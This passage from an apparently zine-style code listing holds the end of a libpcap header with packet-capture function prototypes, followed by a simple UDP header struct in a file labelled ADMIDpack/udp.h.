pcap_freecode(pcap_t *, struct bpf_program *); int pcap_datalink(pcap_t *); int pcap_snapshot(pcap_t *); int pcap_is_swapped(pcap_t *); int pcap_major_version(pcap_t *); int pcap_minor_version(pcap_t *); /* XXX */ FILE *pcap_file(pcap_t *); int pcap_fileno(pcap_t *); pcap_dumper_t *pcap_dump_open(pcap_t *, const char *); void pcap_dump_close(pcap_dumper_t *); void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */ u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); char *bpf_image(struct bpf_insn *, int); #endif <--> <++> ADMIDpack/udp.h struct udphdr { u_short source; /* source port */ u_short dest; /* destination port */ u_short len; /* udp length */ u_short check; /* udp checksum */ }; <--> ----[ EOF